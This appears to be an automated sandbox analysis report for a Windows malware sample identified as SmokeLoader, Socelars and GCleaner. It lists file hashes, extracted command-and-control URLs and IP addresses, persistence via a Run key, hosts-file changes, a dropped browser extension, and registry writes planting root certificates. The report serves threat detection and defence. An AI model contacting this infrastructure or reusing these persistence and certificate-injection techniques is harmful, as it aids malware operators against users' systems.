Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
05-04-2023 15:00
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
General
-
Target
file.exe
-
Size
380KB
-
MD5
d4310c99d42ad36aed4679860c1c368b
-
SHA1
547b0af6d1f0abcea19160d361c4f2e605c3b864
-
SHA256
5531490b3951e8793cb6ee449f75d6fb0b5c1347d1197ccda7ff1b9b15cf9661
-
SHA512
41b789467abb3758c50ba8c4410684cb204ccebdc7a972a9ed94b57d63c89352f1333e44ea0f4ca27aa1a29ed6d0ef32f4e4f336ac29ec9ec43256bbc270040c
-
SSDEEP
6144:x/QiQXCvJm+ksmpk3U9jW1U4P9b4OGBfj/WUplm6zIOYQNd28pTXdAmpCLVRZogE:pQi3vs6m6URA3Ph4lL//plmW9bTXeVh8
Malware Config
Extracted
socelars
https://hdbywe.s3.us-west-2.amazonaws.com/dfgg320/
Extracted
gcleaner
45.12.253.56
45.12.253.72
45.12.253.98
45.12.253.75
Extracted
smokeloader
pub2
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars payload 2 IoCs
resource yara_rule behavioral1/files/0x0006000000016ce4-308.dat family_socelars behavioral1/files/0x0006000000016ce4-309.dat family_socelars -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts rt.exe -
Executes dropped EXE 7 IoCs
pid Process 1904 file.tmp 1000 rt.exe 1288 ZHaribyzhihi.exe 5492 gcleaner.exe 5612 handdiy_3.exe 5716 toolspub2.exe 5808 toolspub2.exe -
Loads dropped DLL 6 IoCs
pid Process 1236 file.exe 1904 file.tmp 1904 file.tmp 1904 file.tmp 1904 file.tmp 5716 toolspub2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\ZHaribyzhihi.exe\"" rt.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5716 set thread context of 5808 5716 toolspub2.exe 46 -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\manifest.json handdiy_3.exe File opened for modification C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\background.js handdiy_3.exe File created C:\Program Files (x86)\Windows Media Player\ZHaribyzhihi.exe rt.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\icon.png handdiy_3.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\aes.js handdiy_3.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\background.js handdiy_3.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\mode-ecb.js handdiy_3.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\pad-nopadding.js handdiy_3.exe File created C:\Program Files\VideoLAN\TYMKTRGVAR\poweroff.exe rt.exe File created C:\Program Files (x86)\Windows Media Player\ZHaribyzhihi.exe.config rt.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\background.html handdiy_3.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\content.js handdiy_3.exe File created C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\jquery-3.3.1.min.js handdiy_3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe -
Kills process with taskkill 2 IoCs
pid Process 3444 taskkill.exe 3452 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40d72743e067d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f35fd4ec1ca1494aa57fdd0dc6b810a400000000020000000000106600000001000020000000a25783c221446da291fb00c6ee778f2377e1b11b7d27c37224718118c5c18aea000000000e8000000002000020000000de43cb645eb7b63e492e91bff9943f192ad454d99b5d5eeeccf2ed23ce8675c1200000000306b17e474f9d79c45cd061bbeaf8552c4554f0e8066baec101a214356b40d640000000b00cc42dc79767353ff59217db65c39de3d18b0939b64793052fcfcdfb139e13a8d8027cf9fa66f24929e41773546bca3778b4429f627880eb901bca139edf5f iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f35fd4ec1ca1494aa57fdd0dc6b810a400000000020000000000106600000001000020000000bd388d8eb1c9c0d6feadf8b03a2587e68f47ea2ef4e27d8847b0887a9c085095000000000e80000000020000200000005509bde5cbeccc8ca03ede6e670505f9aef1dd9caf9ead0f66a81ef3be54e43d90000000188b272f9da2bb27c9e0abb5c46195b18253ce48606945de9eae1d1eaba3867ea3eac091ded4f3e5dc2e9e3d3604bf907bf1510f73ad12291f6153d6f76a3860978dd4f18b65957892fd43d980270af45d0a683b3ed2ea009ddeb4271cf2ab8da1da20b70461485b59543f60b11abd671e7f375687cb7d09d44b5df0a567f9d7253a7d59b879529d94a8a382b25528bd40000000694343ec052d28d41fb7d9831d3b5ea1b6ffc5fe9aa2d667bd9dd428f2f73b65a1da3bb4e82cf0b087c2ff864858150193f39a07f88b3f1ca688367f10a740ce iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{63ABA191-D3D3-11ED-80EC-C227D5A71BE4} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "387479015" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd rt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A ZHaribyzhihi.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 ZHaribyzhihi.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e handdiy_3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 rt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd rt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd rt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 ZHaribyzhihi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 handdiy_3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 